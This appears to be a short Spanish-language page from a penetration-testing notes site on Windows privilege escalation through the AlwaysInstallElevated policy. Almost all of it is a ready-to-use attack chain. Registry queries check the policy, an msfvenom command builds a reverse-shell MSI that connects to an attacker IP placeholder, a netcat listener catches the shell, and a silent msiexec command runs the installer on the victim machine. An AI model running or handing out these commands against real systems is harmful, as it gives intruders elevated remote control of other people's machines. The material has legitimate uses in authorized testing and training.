Always install elevated

Revisar si el valor de ambos AlwaysInstallElevated es 1.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Generación de instalador "MSI" (Microsoft Installer) con reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> -f msi -o reverse-shell.msi

Dejer netcat en modo escucha para recibir la reverse shell.

nc -lvnp <listen-port>

Copiar a la máquina victima el instalador generado reverse-shell.msi y ejecutarlo de la siguiente forma:

msiexec /quiet /qn /i reverse-shell.msi

AnteriorMetasploit SiguienteSeImpersonate / SeAssignPrimaryToken

Última actualización hace 2 años